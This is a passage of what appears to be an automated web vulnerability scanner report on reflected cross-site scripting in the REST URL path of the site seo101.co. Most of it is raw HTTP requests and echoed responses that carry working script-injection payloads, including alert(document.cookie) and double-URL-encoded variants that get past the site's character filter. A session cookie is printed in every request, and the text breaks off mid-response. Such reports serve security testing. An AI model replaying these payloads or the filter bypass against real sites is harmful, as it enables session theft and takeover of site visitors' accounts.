The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/imgbc8c5%253balert%25281%2529%252f%252ff4f7b22376/total.png HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title> ...[SNIP]... </imgbc8c5;alert(1)//f4f7b22376/total.png SEO101 Stats and Site Ranking</title> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload b720e%253balert%25281%2529%252f%252fb6ff4140a3d was submitted in the REST URL parameter 4. This input was echoed as b720e;alert(1)//b6ff4140a3d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/total.pngb720e%253balert%25281%2529%252f%252fb6ff4140a3d HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title> ...[SNIP]... </img/total.pngb720e;alert(1)//b6ff4140a3d SEO101 Stats and Site Ranking</title> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e71f6"><script>alert(1)</script>0777330d80 was submitted in the REST URL parameter 4. This input was echoed as e71f6\"><script>alert(1)</script>0777330d80 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/total.pnge71f6"><script>alert(1)</script>0777330d80 HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title> ...[SNIP]... </img/total.pnge71f6\"><script>alert(1)</script>0777330d80 seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2267"><script>alert(1)</script>30ad2cd3560 was submitted in the REST URL parameter 1. This input was echoed as a2267\"><script>alert(1)</script>30ad2cd3560 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3Ca2267"><script>alert(1)</script>30ad2cd3560/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/xml-sitemap.jpeg HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e9a15</script><script>alert(1)</script>b591e76bc8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3Ce9a15</script><script>alert(1)</script>b591e76bc8/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/xml-sitemap.jpeg HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
The value of REST URL parameter 1 is copied into the name of an HTML tag. The payload 7bb35><script>alert(1)</script>d8953906b6b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C7bb35><script>alert(1)</script>d8953906b6b/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/xml-sitemap.jpeg HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
The value of REST URL parameter 2 is copied into the name of an HTML tag. The payload 13847><script>alert(1)</script>57bbfc96efe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C/13847><script>alert(1)</script>57bbfc96efe/img/xml-sitemap.jpeg HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</13847><script>alert(1)</script>57bbfc96efe/img/xml-sitemap.jpeg SEO101 Stats and Site Ranking</title> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65624"><script>alert(1)</script>6457cd1dab2 was submitted in the REST URL parameter 2. This input was echoed as 65624\"><script>alert(1)</script>6457cd1dab2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C65624"><script>alert(1)</script>6457cd1dab2/img/xml-sitemap.jpeg HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title> ...[SNIP]... <65624\"><script>alert(1)</script>6457cd1dab2/img/xml-sitemap.jpeg seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," /> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload be063%253balert%25281%2529%252f%252f1edc52f10f0 was submitted in the REST URL parameter 2. This input was echoed as be063;alert(1)//1edc52f10f0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3Cbe063%253balert%25281%2529%252f%252f1edc52f10f0/img/xml-sitemap.jpeg HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title> ...[SNIP]... <be063;alert(1)//1edc52f10f0/img/xml-sitemap.jpeg SEO101 Stats and Site Ranking</title> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2fbf"><script>alert(1)</script>75484e96ae1 was submitted in the REST URL parameter 3. This input was echoed as d2fbf\"><script>alert(1)</script>75484e96ae1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/imgd2fbf"><script>alert(1)</script>75484e96ae1/xml-sitemap.jpeg HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title> ...[SNIP]... </imgd2fbf\"><script>alert(1)</script>75484e96ae1/xml-sitemap.jpeg seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," /> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload bfb0f%253balert%25281%2529%252f%252fdf6abbdbd6d was submitted in the REST URL parameter 3. This input was echoed as bfb0f;alert(1)//df6abbdbd6d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/imgbfb0f%253balert%25281%2529%252f%252fdf6abbdbd6d/xml-sitemap.jpeg HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title> ...[SNIP]... </imgbfb0f;alert(1)//df6abbdbd6d/xml-sitemap.jpeg SEO101 Stats and Site Ranking</title> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 8b541%253balert%25281%2529%252f%252f01ce04eaf40 was submitted in the REST URL parameter 4. This input was echoed as 8b541;alert(1)//01ce04eaf40 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/xml-sitemap.jpeg8b541%253balert%25281%2529%252f%252f01ce04eaf40 HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title> ...[SNIP]... </img/xml-sitemap.jpeg8b541;alert(1)//01ce04eaf40 SEO101 Stats and Site Ranking</title> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a487b"><script>alert(1)</script>1fdeb6d84a1 was submitted in the REST URL parameter 4. This input was echoed as a487b\"><script>alert(1)</script>1fdeb6d84a1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/xml-sitemap.jpega487b"><script>alert(1)</script>1fdeb6d84a1 HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title> ...[SNIP]... </img/xml-sitemap.jpega487b\"><script>alert(1)</script>1fdeb6d84a1 seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," /> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5dbbe</script><script>alert(1)</script>f31b1dff3de was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C5dbbe</script><script>alert(1)</script>f31b1dff3de/title%3E%3Cscript%3Ealert(document.cookie)%3C/js/jquery.js HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
The value of REST URL parameter 1 is copied into the name of an HTML tag. The payload ef595><script>alert(1)</script>102cb460ae6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3Cef595><script>alert(1)</script>102cb460ae6/title%3E%3Cscript%3Ealert(document.cookie)%3C/js/jquery.js HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 659f2"><script>alert(1)</script>97310d20da1 was submitted in the REST URL parameter 1. This input was echoed as 659f2\"><script>alert(1)</script>97310d20da1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C659f2"><script>alert(1)</script>97310d20da1/title%3E%3Cscript%3Ealert(document.cookie)%3C/js/jquery.js HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f9127%253balert%25281%2529%252f%252faa3f93e9c93 was submitted in the REST URL parameter 2. This input was echoed as f9127;alert(1)//aa3f93e9c93 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3Cf9127%253balert%25281%2529%252f%252faa3f93e9c93/js/jquery.js HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title> ...[SNIP]... <f9127;alert(1)//aa3f93e9c93/js/jquery.js SEO101 Stats and Site Ranking</title> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75959"><script>alert(1)</script>7d89ea9873a was submitted in the REST URL parameter 2. This input was echoed as 75959\"><script>alert(1)</script>7d89ea9873a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C75959"><script>alert(1)</script>7d89ea9873a/js/jquery.js HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title> ...[SNIP]... <75959\"><script>alert(1)</script>7d89ea9873a/js/jquery.js seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the name of an HTML tag. The payload a92b1><script>alert(1)</script>cd10e7cc5fd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C/a92b1><script>alert(1)</script>cd10e7cc5fd/js/jquery.js HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</a92b1><script>alert(1)</script>cd10e7cc5fd/js/jquery.js SEO101 Stats and Site Ranking</title> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload ac89b%253balert%25281%2529%252f%252f3a3c1297259 was submitted in the REST URL parameter 3. This input was echoed as ac89b;alert(1)//3a3c1297259 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/jsac89b%253balert%25281%2529%252f%252f3a3c1297259/jquery.js HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/